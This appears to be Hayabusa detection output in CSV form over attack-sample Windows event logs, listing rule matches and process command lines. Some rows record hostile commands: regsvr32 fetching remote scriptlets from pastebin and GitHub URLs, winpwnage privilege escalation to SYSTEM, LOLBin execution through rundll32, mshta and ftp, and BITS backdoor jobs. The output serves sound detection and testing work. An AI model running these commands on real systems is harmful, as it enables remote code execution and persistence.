+2019-05-12 02:58:54.903 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.981 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.090 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
+2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator  :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
+2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta""   :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
+2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
+2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
+2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
+2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe""  -a c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\pcalua.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\pcalua.exe""  -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor  :  URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: regsvr32.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll  :  Path: C:\ProgramData\jabber.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: jabber.exe  /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola  :  URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding  :  Path: C:\Windows\System32\mobsync.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R  :  Path: C:\Windows\System32\wbem\WMIADAP.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding  :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
